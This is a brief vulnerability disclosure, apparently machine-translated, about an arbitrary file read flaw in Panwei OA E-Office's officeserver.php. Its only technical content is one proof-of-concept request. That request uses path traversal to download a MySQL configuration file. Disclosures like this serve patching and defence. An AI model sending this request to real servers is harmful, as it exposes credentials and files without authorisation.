Panwei Oa E Office Officeserver Php Arbitrary File Reading Vulnerability
Panwei Oa E Office Officeserver Php Arbitrary File Reading Vulnerability
Panwei OA E-Office officeserver.php arbitrary file reading vulnerability
Vulnerability Description
There is a vulnerability to read any file on the Panwei OA E-Office officeserver.php file. The attacker can download any file on the server through the vulnerability.
Vulnerability Impact
Panwei OA E-Office
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
This post is licensed under CC BY 4.0 by the author.